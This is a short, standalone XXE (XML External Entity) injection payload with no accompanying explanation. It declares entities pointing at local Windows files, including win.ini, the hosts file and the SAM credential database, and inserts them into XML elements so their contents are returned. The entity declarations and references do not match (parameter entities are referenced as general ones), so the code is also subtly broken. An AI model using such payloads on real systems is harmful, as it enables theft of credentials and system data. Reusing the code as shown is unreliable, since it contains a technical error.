xml payload
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % low SYSTEM "file:///C:/Windows/win.ini"> <!ENTITY % medium SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts"> <!ENTITY % public SYSTEM "file:///C:/Users/Public/Documents/important.txt"> <!ENTITY % admin SYSTEM "file:///C:/Windows/System32/config/SAM"> ]> <root> <check1>&low;</check1> <check2>&medium;</check2> <check3>&public;</check3> <check4>&admin;</check4> </root>